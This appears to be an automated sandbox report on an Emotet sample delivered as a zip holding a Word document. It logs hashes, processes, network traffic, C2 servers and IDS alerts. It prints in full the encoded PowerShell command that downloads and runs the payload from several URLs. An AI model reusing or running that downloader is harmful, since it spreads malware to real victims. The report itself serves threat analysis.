File name: | sample.zip |
Full analysis: | https://app.any.run/tasks/ce4886aa-3059-4eea-80d3-ce000c67ee07 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 17:54:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 2681A6BED0DFCE8D0441E54FB0D357B4 |
SHA1: | 65A307AD87FB2D2C30E11E56781DA82F9DA7BD6E |
SHA256: | 52531D2E32E21C3109BEB074098D98AB7807CD130832E69264820A7F1BABE6CB |
SSDEEP: | 3072:sKH+r9M6V615mqUCt3ImFOxpl/BLJOxAG1LQOyu66BFhaE:s5rG6V67l1VFcBlIAG1LQOyu66p5 |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 788 |
---|---|
ZipBitFlag: | 0x0001 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:10:14 17:53:14 |
ZipCRC: | 0x129ffde9 |
ZipCompressedSize: | 138713 |
ZipUncompressedSize: | 237056 |
ZipFileName: | 1dee09b40f84fedce8227e251073f269971a16e39e75af46c3658f0802c828f3.bin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2168 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\sample.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
2952 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\hero.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2744 | powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeAA1AGYAZgA2ADMANAAzAGMANwBlADAAPQAnAGEAMAB4ADEAYQAyAGQANgAxADQAYQBiAGEAOAA1ADIAMAAnADsAJABhADAAeABjADUAZgBmAGMAOQBiAGQAMgAyADUANQBjADUAZQAgAD0AIAAnADkANgA4ACcAOwAkAGEAMAB4AGUANABlAGYANwAwADIANgBiADkAMABiADIANQA9ACcAYQAwAHgANwAyADEAYgAzAGYAZQBkADcAMgA5ACcAOwAkAGEAMAB4ADQAMwAyADUAMgBiAGUAYgA5AGMAYgA0ADUAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAYwA1AGYAZgBjADkAYgBkADIAMgA1ADUAYwA1AGUAKwAnAC4AZQB4AGUAJwA7ACQAYQAwAHgAMQAwADQAZQAzADgAOQAyADUAOQAwADgAPQAnAGEAMAB4AGMAMAA5ADcANgBlAGUAZAAwAGUAOQA1AGYANQAxACcAOwAkAGEAMAB4ADMANQBhAGIANQBjAGUAYQBlADEAOABlADgAOQA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAATgBFAHQALgBXAEUAYgBDAEwASQBlAG4AVAA7ACQAYQAwAHgAYwA4ADQAZgA1AGQAMwAzADkAOAA9ACcAaAB0AHQAcABzADoALwAvAHMAaAByAGUAZQB1AG0AaQB5AGEAZwByAG8AdQBwAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AaQBiADUAZQB0AC0ANAAzAGcAZgAtADQAMQA1ADIANQAyADAAMwA3AC8AKgBoAHQAdABwAHMAOgAvAC8AZQBsAGUAYwB0AHIAbwBrAGEAdgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEoASwBKAEUASwBPAFgARQBaAC8AKgBoAHQAdABwADoALwAvAGEAbQBpAHQAbgBhAHcAYQBuAGkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB4AE0ARwB2AEUASQBnAFgALwAqAGgAdAB0AHAAcwA6AC8ALwBqAGEAbgBlAGsAdgBhAGwAdABpAG4ALgBjAG8AbQAvAHUAYgBwAG8AcwAvAHgANABhAHQAMwA1AHkAcABkADMALQB5AGwAegB2AGYAbwBzAC0AMAAxADcAMwA5ADEAMAA4ADAALwAqAGgAdAB0AHAAcwA6AC8ALwBkAHUAcABlAHIAYQBkAHoALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFkAegBkAEMASQBsAFUALwAnAC4AIgBzAHAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAYQAwAHgANgBjAGYAYQA5AGIAYwBmAGMAMQA4AD0AJwBhADAAeAA2AGQAMQBjAGUAYgAzADYAOAAzADAANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAYQAwAHgAYQAyADgAZAAxADUANwBiADkAZgAzADYAMwAgAGkAbgAgACQAYQAwAHgAYwA4ADQAZgA1AGQAMwAzADkAOAApAHsAdAByAHkAewAkAGEAMAB4ADMANQBhAGIANQBjAGUAYQBlADEAOABlADgAOQAuACIARABPAFcAYABOAEwATwBBAEQAYABGAEkATABFACIAKAAkAGEAMAB4AGEAMgA4AGQAMQA1ADcAYgA5AGYAMwA2ADMALAAgACQAYQAwAHgANAAzADIANQAyAGIAZQBiADkAYwBiADQANQAxACkAOwAkAGEAMAB4ADkAMwAwAGMANAA5AGIAYwA3ADMANAA9ACcAYQAwAHgAOQBkADUAYQA3AGUANgBlADIANAA0AGEAOQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAGEAMAB4ADQAMwAyADUAMgBiAGUAYgA5AGMAYgA0ADUAMQApAC4AIgBsAGUAbgBgAGcAdABIACIAIAAtAGcAZQAgADMANQA4ADIAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAdAAiACgAJABhADAAeAA0ADMAMgA1ADIAYgBlAGIAOQBjAGIANAA1ADEAKQA7ACQAYQAwAHgANgA2ADgANQA4ADIAMwBkADcANQA0ADYAPQAnAGEAMAB4ADUAZAA3ADIAMwBhADkAMgA4ADgANwBlAGUANgAnADsAYgByAGUAYQBrADsAJABhADAAeAAyAGEANgA1ADYAMQBhAGUAMwA0ADUAZgBlADUAPQAnAGEAMAB4AGMANgBkADgANQA5AGQAMwBkADAAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgANABjAGUAYwAzAGEAMAAyADQANAAzADkAZQA9ACcAYQAwAHgAYQA0ADMANQAwAGYAOQBhADkAZQAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3932 | "C:\Users\admin\968.exe" | C:\Users\admin\968.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2816 | --d55991b9 | C:\Users\admin\968.exe | 968.exe | |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2140 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 968.exe |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
3972 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Version: 1, 0, 0, 1 | ||||
3980 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" /scomma "C:\Users\admin\AppData\Local\Temp\E6EB.tmp" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2952 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR22FE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2744 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\33GKAHXFAIDLLE2ES4AY.temp | — | |
MD5:— | SHA256:— | |||
2952 | WINWORD.EXE | C:\Users\admin\Desktop\~$hero.doc | pgc | |
MD5:D17F055567AEFF78F20C2DCEEB3CDDDD | SHA256:02997C861BA55D9307D010A6C91863472F1ED28D6140759EF631C85928EC3F8C | |||
2952 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9C97F0.wmf | wmf | |
MD5:9D75EE758515C000E1448CCD2C7C7EF8 | SHA256:94A247FEBE5DBF8347485CC0059BB48E0D5116DA57036B80626B50CD6BC1E156 | |||
2952 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:DF4CB057968E8A5510051549076E4859 | SHA256:AE28D02BF5F757A9CB253DB9883E17A9DE86CFC8E7915FDD03C007A63CE3459F | |||
2952 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6DB12EB.wmf | wmf | |
MD5:8825E9B760F08A27ABEFCB8BAD1A61C8 | SHA256:603F41A9AC70369290851615FD57B1EC8A49EC7A4D6EAFDB0F84E527BF9BACC0 | |||
2952 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2CAC69AA.wmf | wmf | |
MD5:D80CD9865C96FC01A002C4AB2702702B | SHA256:6548B47FAEFA84C1854AAFAB99162F6362AA585A6FE112540B41AAC881DD29BD | |||
2952 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD5FE12.wmf | wmf | |
MD5:5D6FD4A9D5777302164F272765429B40 | SHA256:C7BF22B810A60ABE272FDEFC6EA676C4947694313FF8CF9DDFBE55461C68B1BC | |||
2744 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3a33a8.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2952 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7D66C3C.wmf | wmf | |
MD5:0A6ED135C474427BCC8416A2284C4E21 | SHA256:7E808A6A287638843364F795A03A14CE7C116E7163E670B87E192959AA40B066 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3972 | msptermsizes.exe | GET | — | 192.241.241.221:443 | http://192.241.241.221:443/whoami.php | US | — | — | malicious |
3972 | msptermsizes.exe | GET | — | 192.241.241.221:443 | http://192.241.241.221:443/whoami.php | US | — | — | malicious |
3972 | msptermsizes.exe | POST | 200 | 178.32.255.133:443 | http://178.32.255.133:443/merge/stubs/ | FR | binary | 148 b | malicious |
3972 | msptermsizes.exe | GET | 200 | 185.187.198.5:8080 | http://185.187.198.5:8080/whoami.php | RU | text | 14 b | malicious |
3972 | msptermsizes.exe | GET | 200 | 178.32.255.133:443 | http://178.32.255.133:443/whoami.php | FR | text | 14 b | malicious |
3972 | msptermsizes.exe | POST | 200 | 190.117.206.153:443 | http://190.117.206.153:443/merge/jit/add/merge/ | PE | binary | 148 b | malicious |
3972 | msptermsizes.exe | POST | 200 | 185.187.198.5:8080 | http://185.187.198.5:8080/balloon/ | RU | binary | 168 Kb | malicious |
3972 | msptermsizes.exe | POST | 200 | 178.32.255.133:443 | http://178.32.255.133:443/ban/ | FR | binary | 148 b | malicious |
3972 | msptermsizes.exe | POST | 200 | 190.117.206.153:443 | http://190.117.206.153:443/tlb/tlb/add/merge/ | PE | mp3 | 1.85 Mb | malicious |
3972 | msptermsizes.exe | POST | 200 | 185.187.198.5:8080 | http://185.187.198.5:8080/splash/add/ | RU | binary | 3.20 Mb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2744 | powershell.exe | 173.248.148.197:443 | shreeumiyagroup.com | Handy Networks, LLC | US | unknown |
3972 | msptermsizes.exe | 178.32.255.133:443 | — | OVH SAS | FR | malicious |
3972 | msptermsizes.exe | 185.187.198.5:8080 | — | Pravoved LLC | RU | malicious |
3972 | msptermsizes.exe | 192.241.241.221:443 | — | Digital Ocean, Inc. | US | malicious |
3972 | msptermsizes.exe | 190.117.206.153:443 | — | America Movil Peru S.A.C. | PE | malicious |
3972 | msptermsizes.exe | 203.89.134.15:465 | mail.omlogistics.co.in | OM Logistics Limited | IN | unknown |
3972 | msptermsizes.exe | 202.137.236.12:587 | smtp.rediffmailpro.com | Rediff.com India Limited | IN | unknown |
3972 | msptermsizes.exe | 188.125.73.26:587 | smtp.mail.yahoo.com | — | CH | unknown |
3972 | msptermsizes.exe | 74.125.133.109:465 | smtp.gmail.com | Google Inc. | US | whitelisted |
3972 | msptermsizes.exe | 217.74.64.236:465 | poczta.interia.pl | INTERIA.PL Sp z.o.o. | PL | unknown |
Domain | IP | Reputation |
---|---|---|
shreeumiyagroup.com |
| unknown |
smtp.gmail.com |
| shared |
mail.sstelecoms.com |
| unknown |
smtp.dapda.com |
| unknown |
mail.omlogistics.co.in |
| unknown |
smtp.rediffmailpro.com |
| shared |
smtp.mail.yahoo.com |
| shared |
poczta.interia.pl |
| unknown |
smtp.live.com |
| shared |
imap.twomountains.co.za |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3972 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 11 |
3972 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3972 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3972 | msptermsizes.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3972 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3972 | msptermsizes.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3972 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3972 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3972 | msptermsizes.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
3972 | msptermsizes.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |